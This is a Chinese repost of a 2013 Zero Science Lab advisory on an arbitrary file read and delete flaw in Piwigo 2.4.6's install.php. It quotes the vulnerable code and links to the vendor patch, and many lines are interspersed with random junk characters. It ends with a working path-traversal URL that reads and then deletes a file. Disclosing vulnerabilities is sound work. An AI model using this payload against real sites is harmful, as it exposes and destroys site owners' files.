Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
- M- x; H9 M  _8 G& i: y) ]" z! |
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
. {- c  c2 P$ x1 @$ k. ~, O6 X====================================================================
/install.php:
; U5 |5 E( o- o. i! r. P8 G+ N-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
0 Q/ W3 E1 g2 Z! ?+ J! H115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
/ O$ F8 @/ i, F' [! V/ [) f118:   header('Content-Disposition: attachment; filename="database.inc.php"');
, R7 \/ i: i/ i* M8 X- G, Z119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
% H+ X" ?: B- {' b9 p122:   unlink($filename);
123:   exit();
124: }
4 E+ ^3 s+ W* w! g3 L; d% ^( P5 \====================================================================
) W0 C9 ~; ^* x4 a) C0 S  U
  l( A6 W9 \2 f+ T; o! eTested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

7 o+ K! p& j' I7 `3 WAdvisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
. r- P, J4 c# v1 Z6 j& `Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
- @4 r* E8 y' P1 |. B+ z  [6 y' {
+ {, U4 Q0 F" n/ }15.02.2013
) z+ t! T' g6 G
+ c: |& U7 A6 e4 u2 T8 M1 @6 Q% m: W--
/ b& k8 J: g* ?) Z6 @" Phttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
: h0 Y6 f" r) c
) o& c2 O* A- Z